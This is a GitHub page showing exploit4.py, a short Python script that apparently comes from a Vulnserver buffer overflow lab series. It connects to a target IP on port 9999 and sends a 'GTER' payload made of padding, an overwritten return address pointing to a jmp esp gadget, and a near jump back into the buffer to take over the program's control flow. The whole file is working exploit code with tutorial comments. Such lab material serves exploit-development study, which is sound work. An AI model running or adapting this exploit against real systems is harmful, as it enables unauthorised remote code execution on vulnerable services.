-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathexploit4.py
30 lines (25 loc) · 1.07 KB
/
exploit4.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#! /bin/python3
import socket # The module "socket" provides access to the BSD socket interface
import struct # The module "struct" performs conversions between Python values and C structs represented as Python bytes objects.
import sys # The module "sys" provides access to the runtime environment and allows us to gather information about it.
# Check that we have a target IP
if (len(sys.argv) < 2):
print("This program requires one Command Line Argument. This should be the IPv4 address of the target machine")
exit(1)
# Set Constants for later use
HOST = sys.argv[1] # Extract target IP
PORT = 9999 # victim port
# Generate payload, this includes a packed ROP (Encoded)
# so we can change the control flow of the program
PAYLOAD = (
b'GTER /.:/' +
b'A' * 135 +
# jmp esp
struct.pack('<L', 0x62501023) +
# JMP to the start of our buffer
b'\xe9\x64\xff\xff\xff' + # In exploit 03 GTER_Reuse this is increased
b'C' * (400 - 135 - 4 - 5)
)
with socket.create_connection((HOST, PORT)) as fd:
fd.recv(128)
fd.sendall(PAYLOAD)